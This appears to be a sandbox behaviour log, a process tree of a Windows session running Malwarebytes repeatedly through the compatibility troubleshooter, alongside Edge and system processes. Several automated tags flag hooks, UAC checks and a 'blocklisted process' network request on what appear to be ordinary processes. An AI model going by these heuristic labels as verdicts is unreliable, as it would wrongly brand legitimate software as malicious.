C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe" -ServerName:MicrosoftEdge.AppXdnhjhccw3zf0j06tkg3jtqr00qdm0khc.mca1⤵
-
C:\Windows\system32\browser_broker.exeC:\Windows\system32\browser_broker.exe -Embedding1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k SDRSVC1⤵
-
C:\Windows\system32\pcwrun.exeC:\Windows\system32\pcwrun.exe "C:\Program Files\Malwarebytes\Anti-Malware\mbam.exe" CompatTab1⤵
-
C:\Windows\System32\msdt.exeC:\Windows\System32\msdt.exe -path C:\Windows\diagnostics\index\PCWDiagnostic.xml -af C:\Users\Admin\AppData\Local\Temp\PCW3205.xml /skip TRUE2⤵
-
C:\Windows\system32\rundll32.exe"C:\Windows\system32\rundll32.exe" C:\Windows\system32\pcwutl.dll,LaunchApplication "C:\Program Files\Malwarebytes\Anti-Malware\mbam.exe"3⤵
-
C:\Program Files\Malwarebytes\Anti-Malware\mbam.exe"C:\Program Files\Malwarebytes\Anti-Malware\mbam.exe"4⤵
-
-
-
C:\Windows\system32\rundll32.exe"C:\Windows\system32\rundll32.exe" C:\Windows\system32\pcwutl.dll,LaunchApplication "C:\Program Files\Malwarebytes\Anti-Malware\mbam.exe"3⤵
-
C:\Program Files\Malwarebytes\Anti-Malware\mbam.exe"C:\Program Files\Malwarebytes\Anti-Malware\mbam.exe"4⤵
-
-
-
C:\Windows\system32\rundll32.exe"C:\Windows\system32\rundll32.exe" C:\Windows\system32\pcwutl.dll,LaunchApplication "C:\Program Files\Malwarebytes\Anti-Malware\mbam.exe"3⤵
-
C:\Program Files\Malwarebytes\Anti-Malware\mbam.exe"C:\Program Files\Malwarebytes\Anti-Malware\mbam.exe"4⤵
-
-
-
C:\Windows\system32\rundll32.exe"C:\Windows\system32\rundll32.exe" C:\Windows\system32\pcwutl.dll,LaunchApplication "C:\Program Files\Malwarebytes\Anti-Malware\mbam.exe"3⤵
-
C:\Program Files\Malwarebytes\Anti-Malware\mbam.exe"C:\Program Files\Malwarebytes\Anti-Malware\mbam.exe"4⤵
-
-
-
C:\Windows\system32\rundll32.exe"C:\Windows\system32\rundll32.exe" C:\Windows\system32\pcwutl.dll,LaunchApplication "C:\Program Files\Malwarebytes\Anti-Malware\mbam.exe"3⤵
-
C:\Program Files\Malwarebytes\Anti-Malware\mbam.exe"C:\Program Files\Malwarebytes\Anti-Malware\mbam.exe"4⤵
-
-
-
C:\Windows\system32\rundll32.exe"C:\Windows\system32\rundll32.exe" C:\Windows\system32\pcwutl.dll,LaunchApplication "C:\Program Files\Malwarebytes\Anti-Malware\mbam.exe"3⤵
-
C:\Program Files\Malwarebytes\Anti-Malware\mbam.exe"C:\Program Files\Malwarebytes\Anti-Malware\mbam.exe"4⤵
- Checks whether UAC is enabled
- Suspicious behavior: MapViewOfSection
- Suspicious use of SetWindowsHookEx
-
-
-
C:\Windows\system32\rundll32.exe"C:\Windows\system32\rundll32.exe" C:\Windows\system32\pcwutl.dll,LaunchApplication "C:\Program Files\Malwarebytes\Anti-Malware\mbam.exe"3⤵
-
C:\Program Files\Malwarebytes\Anti-Malware\mbam.exe"C:\Program Files\Malwarebytes\Anti-Malware\mbam.exe"4⤵
-
-
-
C:\Windows\system32\rundll32.exe"C:\Windows\system32\rundll32.exe" C:\Windows\system32\pcwutl.dll,LaunchApplication "C:\Program Files\Malwarebytes\Anti-Malware\mbam.exe"3⤵
-
C:\Program Files\Malwarebytes\Anti-Malware\mbam.exe"C:\Program Files\Malwarebytes\Anti-Malware\mbam.exe"4⤵
- Checks whether UAC is enabled
- Modifies registry class
-
-
-
C:\Windows\system32\rundll32.exe"C:\Windows\system32\rundll32.exe" C:\Windows\system32\pcwutl.dll,LaunchApplication "C:\Program Files\Malwarebytes\Anti-Malware\mbam.exe"3⤵
-
C:\Program Files\Malwarebytes\Anti-Malware\mbam.exe"C:\Program Files\Malwarebytes\Anti-Malware\mbam.exe"4⤵
-
-
-
C:\Windows\system32\rundll32.exe"C:\Windows\system32\rundll32.exe" C:\Windows\system32\pcwutl.dll,LaunchApplication "C:\Program Files\Malwarebytes\Anti-Malware\mbam.exe"3⤵
-
C:\Program Files\Malwarebytes\Anti-Malware\mbam.exe"C:\Program Files\Malwarebytes\Anti-Malware\mbam.exe"4⤵
-
-
-
C:\Windows\system32\rundll32.exe"C:\Windows\system32\rundll32.exe" C:\Windows\system32\pcwutl.dll,LaunchApplication "C:\Program Files\Malwarebytes\Anti-Malware\mbam.exe"3⤵
-
C:\Program Files\Malwarebytes\Anti-Malware\mbam.exe"C:\Program Files\Malwarebytes\Anti-Malware\mbam.exe"4⤵
-
-
-
C:\Windows\system32\rundll32.exe"C:\Windows\system32\rundll32.exe" C:\Windows\system32\pcwutl.dll,LaunchApplication "C:\Program Files\Malwarebytes\Anti-Malware\mbam.exe"3⤵
-
C:\Program Files\Malwarebytes\Anti-Malware\mbam.exe"C:\Program Files\Malwarebytes\Anti-Malware\mbam.exe"4⤵
-
-
-
C:\Windows\system32\rundll32.exe"C:\Windows\system32\rundll32.exe" C:\Windows\system32\pcwutl.dll,LaunchApplication "C:\Program Files\Malwarebytes\Anti-Malware\mbam.exe"3⤵
-
C:\Program Files\Malwarebytes\Anti-Malware\mbam.exe"C:\Program Files\Malwarebytes\Anti-Malware\mbam.exe"4⤵
-
-
-
C:\Windows\system32\rundll32.exe"C:\Windows\system32\rundll32.exe" C:\Windows\system32\pcwutl.dll,LaunchApplication "C:\Program Files\Malwarebytes\Anti-Malware\mbam.exe"3⤵
-
C:\Program Files\Malwarebytes\Anti-Malware\mbam.exe"C:\Program Files\Malwarebytes\Anti-Malware\mbam.exe"4⤵
-
-
-
C:\Windows\system32\rundll32.exe"C:\Windows\system32\rundll32.exe" C:\Windows\system32\pcwutl.dll,LaunchApplication "C:\Program Files\Malwarebytes\Anti-Malware\mbam.exe"3⤵
-
C:\Program Files\Malwarebytes\Anti-Malware\mbam.exe"C:\Program Files\Malwarebytes\Anti-Malware\mbam.exe"4⤵
-
-
-
C:\Windows\system32\rundll32.exe"C:\Windows\system32\rundll32.exe" C:\Windows\system32\pcwutl.dll,LaunchApplication "C:\Program Files\Malwarebytes\Anti-Malware\mbam.exe"3⤵
-
C:\Program Files\Malwarebytes\Anti-Malware\mbam.exe"C:\Program Files\Malwarebytes\Anti-Malware\mbam.exe"4⤵
-
-
-
C:\Windows\system32\rundll32.exe"C:\Windows\system32\rundll32.exe" C:\Windows\system32\pcwutl.dll,LaunchApplication "C:\Program Files\Malwarebytes\Anti-Malware\mbam.exe"3⤵
-
C:\Program Files\Malwarebytes\Anti-Malware\mbam.exe"C:\Program Files\Malwarebytes\Anti-Malware\mbam.exe"4⤵
-
-
-
C:\Windows\system32\rundll32.exe"C:\Windows\system32\rundll32.exe" C:\Windows\system32\pcwutl.dll,LaunchApplication "C:\Program Files\Malwarebytes\Anti-Malware\mbam.exe"3⤵
-
C:\Program Files\Malwarebytes\Anti-Malware\mbam.exe"C:\Program Files\Malwarebytes\Anti-Malware\mbam.exe"4⤵
-
-
-
C:\Windows\system32\rundll32.exe"C:\Windows\system32\rundll32.exe" C:\Windows\system32\pcwutl.dll,LaunchApplication "C:\Program Files\Malwarebytes\Anti-Malware\mbam.exe"3⤵
- Blocklisted process makes network request
-
C:\Program Files\Malwarebytes\Anti-Malware\mbam.exe"C:\Program Files\Malwarebytes\Anti-Malware\mbam.exe"4⤵
-
-
-
C:\Windows\system32\rundll32.exe"C:\Windows\system32\rundll32.exe" C:\Windows\system32\pcwutl.dll,LaunchApplication "C:\Program Files\Malwarebytes\Anti-Malware\mbam.exe"3⤵
-
C:\Program Files\Malwarebytes\Anti-Malware\mbam.exe"C:\Program Files\Malwarebytes\Anti-Malware\mbam.exe"4⤵
-
-
-
C:\Windows\system32\rundll32.exe"C:\Windows\system32\rundll32.exe" C:\Windows\system32\pcwutl.dll,LaunchApplication "C:\Program Files\Malwarebytes\Anti-Malware\mbam.exe"3⤵
-
C:\Program Files\Malwarebytes\Anti-Malware\mbam.exe"C:\Program Files\Malwarebytes\Anti-Malware\mbam.exe"4⤵
-
-
-
C:\Windows\system32\rundll32.exe"C:\Windows\system32\rundll32.exe" C:\Windows\system32\pcwutl.dll,LaunchApplication "C:\Program Files\Malwarebytes\Anti-Malware\mbam.exe"3⤵
- Blocklisted process makes network request
-
C:\Program Files\Malwarebytes\Anti-Malware\mbam.exe"C:\Program Files\Malwarebytes\Anti-Malware\mbam.exe"4⤵
-
-
-
C:\Windows\system32\rundll32.exe"C:\Windows\system32\rundll32.exe" C:\Windows\system32\pcwutl.dll,LaunchApplication "C:\Program Files\Malwarebytes\Anti-Malware\mbam.exe"3⤵
-
C:\Program Files\Malwarebytes\Anti-Malware\mbam.exe"C:\Program Files\Malwarebytes\Anti-Malware\mbam.exe"4⤵
-
-
-
C:\Windows\system32\rundll32.exe"C:\Windows\system32\rundll32.exe" C:\Windows\system32\pcwutl.dll,LaunchApplication "C:\Program Files\Malwarebytes\Anti-Malware\mbam.exe"3⤵
- Checks computer location settings
- Checks whether UAC is enabled
- Drops file in Windows directory
- Modifies Control Panel
- Suspicious use of SetWindowsHookEx
-
C:\Program Files\Malwarebytes\Anti-Malware\mbam.exe"C:\Program Files\Malwarebytes\Anti-Malware\mbam.exe"4⤵
-
-
-
C:\Windows\system32\rundll32.exe"C:\Windows\system32\rundll32.exe" C:\Windows\system32\pcwutl.dll,LaunchApplication "C:\Program Files\Malwarebytes\Anti-Malware\mbam.exe"3⤵
-
C:\Program Files\Malwarebytes\Anti-Malware\mbam.exe"C:\Program Files\Malwarebytes\Anti-Malware\mbam.exe"4⤵
-
-
-
C:\Windows\system32\rundll32.exe"C:\Windows\system32\rundll32.exe" C:\Windows\system32\pcwutl.dll,LaunchApplication "C:\Program Files\Malwarebytes\Anti-Malware\mbam.exe"3⤵
- Modifies Internet Explorer settings
-
C:\Program Files\Malwarebytes\Anti-Malware\mbam.exe"C:\Program Files\Malwarebytes\Anti-Malware\mbam.exe"4⤵
-
-
-
C:\Windows\system32\rundll32.exe"C:\Windows\system32\rundll32.exe" C:\Windows\system32\pcwutl.dll,LaunchApplication "C:\Program Files\Malwarebytes\Anti-Malware\mbam.exe"3⤵
-
C:\Program Files\Malwarebytes\Anti-Malware\mbam.exe"C:\Program Files\Malwarebytes\Anti-Malware\mbam.exe"4⤵
-
-
-
C:\Windows\system32\rundll32.exe"C:\Windows\system32\rundll32.exe" C:\Windows\system32\pcwutl.dll,LaunchApplication "C:\Program Files\Malwarebytes\Anti-Malware\mbam.exe"3⤵
-
C:\Program Files\Malwarebytes\Anti-Malware\mbam.exe"C:\Program Files\Malwarebytes\Anti-Malware\mbam.exe"4⤵
-
-
-
C:\Windows\system32\rundll32.exe"C:\Windows\system32\rundll32.exe" C:\Windows\system32\pcwutl.dll,LaunchApplication "C:\Program Files\Malwarebytes\Anti-Malware\mbam.exe"3⤵
-
C:\Program Files\Malwarebytes\Anti-Malware\mbam.exe"C:\Program Files\Malwarebytes\Anti-Malware\mbam.exe"4⤵
-
-
-
C:\Windows\system32\rundll32.exe"C:\Windows\system32\rundll32.exe" C:\Windows\system32\pcwutl.dll,LaunchApplication "C:\Program Files\Malwarebytes\Anti-Malware\mbam.exe"3⤵
-
C:\Program Files\Malwarebytes\Anti-Malware\mbam.exe"C:\Program Files\Malwarebytes\Anti-Malware\mbam.exe"4⤵
-
-
-
C:\Windows\system32\rundll32.exe"C:\Windows\system32\rundll32.exe" C:\Windows\system32\pcwutl.dll,LaunchApplication "C:\Program Files\Malwarebytes\Anti-Malware\mbam.exe"3⤵
-
C:\Program Files\Malwarebytes\Anti-Malware\mbam.exe"C:\Program Files\Malwarebytes\Anti-Malware\mbam.exe"4⤵
-
-
-
C:\Windows\system32\rundll32.exe"C:\Windows\system32\rundll32.exe" C:\Windows\system32\pcwutl.dll,LaunchApplication "C:\Program Files\Malwarebytes\Anti-Malware\mbam.exe"3⤵
-
C:\Program Files\Malwarebytes\Anti-Malware\mbam.exe"C:\Program Files\Malwarebytes\Anti-Malware\mbam.exe"4⤵
-
-
-
C:\Windows\system32\rundll32.exe"C:\Windows\system32\rundll32.exe" C:\Windows\system32\pcwutl.dll,LaunchApplication "C:\Program Files\Malwarebytes\Anti-Malware\mbam.exe"3⤵
-
C:\Program Files\Malwarebytes\Anti-Malware\mbam.exe"C:\Program Files\Malwarebytes\Anti-Malware\mbam.exe"4⤵
-
-
-
C:\Windows\system32\rundll32.exe"C:\Windows\system32\rundll32.exe" C:\Windows\system32\pcwutl.dll,LaunchApplication "C:\Program Files\Malwarebytes\Anti-Malware\mbam.exe"3⤵
-
C:\Program Files\Malwarebytes\Anti-Malware\mbam.exe"C:\Program Files\Malwarebytes\Anti-Malware\mbam.exe"4⤵
-
-
-
-
C:\Windows\System32\sdiagnhost.exeC:\Windows\System32\sdiagnhost.exe -Embedding1⤵
-
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\wyb423uk\wyb423uk.cmdline"2⤵
-
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeC:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES203E.tmp" "c:\Users\Admin\AppData\Local\Temp\wyb423uk\CSC5D05A0BC104C4C9FA2DE92D268E722.TMP"3⤵
-
-
-
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\pmjeosbz\pmjeosbz.cmdline"2⤵
-
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeC:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES381B.tmp" "c:\Users\Admin\AppData\Local\Temp\pmjeosbz\CSCB27C14C373174A029AE03F5E729C0F3.TMP"3⤵
-
-
-
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\x2shcxnj\x2shcxnj.cmdline"2⤵
-
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeC:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES7E8A.tmp" "c:\Users\Admin\AppData\Local\Temp\x2shcxnj\CSCE7FE765448D245AEB41642B5BC592557.TMP"3⤵
-
-
-
C:\Program Files\Malwarebytes\Anti-Malware\mbam.exe"C:\Program Files\Malwarebytes\Anti-Malware\mbam.exe"1⤵
-
C:\Windows\explorer.exeexplorer.exe1⤵
-
C:\Program Files\Malwarebytes\Anti-Malware\mbam.exe"C:\Program Files\Malwarebytes\Anti-Malware\mbam.exe"2⤵
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /q /c del /q "C:\Users\Admin\AppData\Local\Microsoft\OneDrive\StandaloneUpdater\OneDriveSetup.exe"2⤵
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /q /c del /q "C:\Users\Admin\AppData\Local\Microsoft\OneDrive\Update\OneDriveSetup.exe"2⤵
-
-
C:\Windows\system32\taskmgr.exe"C:\Windows\system32\taskmgr.exe" /42⤵
-
-
C:\Program Files\Malwarebytes\Anti-Malware\mbam.exe"C:\Program Files\Malwarebytes\Anti-Malware\mbam.exe"2⤵
-
-
C:\Program Files\Malwarebytes\Anti-Malware\mbam.exe"C:\Program Files\Malwarebytes\Anti-Malware\mbam.exe"2⤵
-
-
C:\Program Files\Malwarebytes\Anti-Malware\mbam.exe"C:\Program Files\Malwarebytes\Anti-Malware\mbam.exe"2⤵
-
-
C:\Program Files\Malwarebytes\Anti-Malware\mbam.exe"C:\Program Files\Malwarebytes\Anti-Malware\mbam.exe"2⤵
-
-
C:\Windows\system32\taskmgr.exe"C:\Windows\system32\taskmgr.exe" /42⤵
-
-
C:\Program Files\Malwarebytes\Anti-Malware\mbam.exe"C:\Program Files\Malwarebytes\Anti-Malware\mbam.exe"2⤵
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -u -p 8256 -s 36763⤵
- Program crash
-
-
-
C:\Windows\system32\taskmgr.exe"C:\Windows\system32\taskmgr.exe" /42⤵
-
-
C:\Program Files\Malwarebytes\Anti-Malware\mbam.exe"C:\Program Files\Malwarebytes\Anti-Malware\mbam.exe"2⤵
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -u -p 6932 -s 34083⤵
- Program crash
-
-
-
C:\Program Files\Malwarebytes\Anti-Malware\mbam.exe"C:\Program Files\Malwarebytes\Anti-Malware\mbam.exe"2⤵
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -u -p 7788 -s 38363⤵
- Program crash
-
-
-
C:\Program Files\Malwarebytes\Anti-Malware\mbam.exe"C:\Program Files\Malwarebytes\Anti-Malware\mbam.exe"2⤵
-
-
C:\Program Files\Malwarebytes\Anti-Malware\mbam.exe"C:\Program Files\Malwarebytes\Anti-Malware\mbam.exe"2⤵
-
C:\Program Files\Malwarebytes\Anti-Malware\mbam.exe"C:\Program Files\Malwarebytes\Anti-Malware\mbam.exe" --delaystart3⤵
-
-
-
C:\Program Files\Malwarebytes\Anti-Malware\mbam.exe"C:\Program Files\Malwarebytes\Anti-Malware\mbam.exe"2⤵
-
-
C:\Program Files\Malwarebytes\Anti-Malware\mbam.exe"C:\Program Files\Malwarebytes\Anti-Malware\mbam.exe"2⤵
- Checks whether UAC is enabled
- Suspicious behavior: MapViewOfSection
- Suspicious use of SetWindowsHookEx
-
-
C:\Program Files\Malwarebytes\Anti-Malware\mbam.exe"C:\Program Files\Malwarebytes\Anti-Malware\mbam.exe"2⤵
-
-
C:\Windows\system32\taskmgr.exe"C:\Windows\system32\taskmgr.exe" /42⤵
-
-
C:\Program Files\Malwarebytes\Anti-Malware\mbam.exe"C:\Program Files\Malwarebytes\Anti-Malware\mbam.exe"2⤵
-
-
C:\Program Files\Malwarebytes\Anti-Malware\mbam.exe"C:\Program Files\Malwarebytes\Anti-Malware\mbam.exe"2⤵
-
-
C:\Program Files\Malwarebytes\Anti-Malware\mbam.exe"C:\Program Files\Malwarebytes\Anti-Malware\mbam.exe"2⤵
-
-
C:\Windows\system32\taskmgr.exe"C:\Windows\system32\taskmgr.exe" /42⤵
-
-
C:\Program Files\Malwarebytes\Anti-Malware\mbam.exe"C:\Program Files\Malwarebytes\Anti-Malware\mbam.exe"2⤵
-
-
C:\Windows\system32\taskmgr.exe"C:\Windows\system32\taskmgr.exe" /42⤵
-
-
C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe"C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe" -ServerName:App.AppXtk181tbxbce2qsex02s8tw7hfxa9xb3t.mca1⤵
-
C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe"C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe" -ServerName:CortanaUI.AppXa50dqqa5gqv4a428c9y1jjw7m3btvepj.mca1⤵
-
C:\Windows\system32\backgroundTaskHost.exe"C:\Windows\system32\backgroundTaskHost.exe" -ServerName:App.AppXmtcan0h2tfbfy7k9kn8hbxb6dmzz1zh0.mca1⤵
- Suspicious use of SendNotifyMessage
-
C:\Windows\System32\rundll32.exeC:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding1⤵
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe" -ServerName:MicrosoftEdge.AppXdnhjhccw3zf0j06tkg3jtqr00qdm0khc.mca1⤵
-
C:\Windows\system32\browser_broker.exeC:\Windows\system32\browser_broker.exe -Embedding1⤵
-
\??\c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs1⤵
- Checks SCSI registry key(s)
- Suspicious behavior: MapViewOfSection
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe" -ServerName:MicrosoftEdge.AppXdnhjhccw3zf0j06tkg3jtqr00qdm0khc.mca1⤵
-
C:\Windows\system32\browser_broker.exeC:\Windows\system32\browser_broker.exe -Embedding1⤵
- Modifies registry class
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵
-
C:\Windows\system32\werfault.exewerfault.exe /h /shared Global\b519ccda03c44335996bd541c209b3e8 /t 5400 /p 59681⤵
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵
-
C:\Windows\system32\werfault.exewerfault.exe /h /shared Global\c7094c9bcd904925b4b557f16da34152 /t 4460 /p 72561⤵
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe" -ServerName:MicrosoftEdge.AppXdnhjhccw3zf0j06tkg3jtqr00qdm0khc.mca1⤵
-
C:\Windows\system32\browser_broker.exeC:\Windows\system32\browser_broker.exe -Embedding1⤵
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵
-
C:\Windows\system32\DllHost.exeC:\Windows\system32\DllHost.exe /Processid:{AB8902B4-09CA-4BB6-B78D-A8F59079A8D5}1⤵
- Drops file in Windows directory
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe" -ServerName:MicrosoftEdge.AppXdnhjhccw3zf0j06tkg3jtqr00qdm0khc.mca1⤵
-
C:\Windows\system32\browser_broker.exeC:\Windows\system32\browser_broker.exe -Embedding1⤵
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe" -ServerName:MicrosoftEdge.AppXdnhjhccw3zf0j06tkg3jtqr00qdm0khc.mca1⤵
-
C:\Windows\system32\browser_broker.exeC:\Windows\system32\browser_broker.exe -Embedding1⤵
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe" -ServerName:MicrosoftEdge.AppXdnhjhccw3zf0j06tkg3jtqr00qdm0khc.mca1⤵
-
C:\Windows\system32\browser_broker.exeC:\Windows\system32\browser_broker.exe -Embedding1⤵
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k WerSvcGroup1⤵
-
C:\Program Files\Malwarebytes\Anti-Malware\MBAMService.exe"C:\Program Files\Malwarebytes\Anti-Malware\MBAMService.exe"1⤵
-
C:\Program Files\Malwarebytes\Anti-Malware\mbamtray.exe"C:\Program Files\Malwarebytes\Anti-Malware\mbamtray.exe"2⤵
-
-
C:\Users\Admin\AppData\LocalLow\IGDump\cfpczrtltcqwotnfmudzolzorpkiqqdx\ig.exeig.exe secure2⤵
-
-
C:\PROGRAM FILES\MALWAREBYTES\ANTI-MALWARE\ig.exeig.exe reseed2⤵
-
-
C:\PROGRAM FILES\MALWAREBYTES\ANTI-MALWARE\ig-0.exeig.exe reseed2⤵
-
-
C:\PROGRAM FILES\MALWAREBYTES\ANTI-MALWARE\ig-1.exeig.exe reseed2⤵
-
-
C:\PROGRAM FILES\MALWAREBYTES\ANTI-MALWARE\ig-2.exeig.exe reseed2⤵
-
-
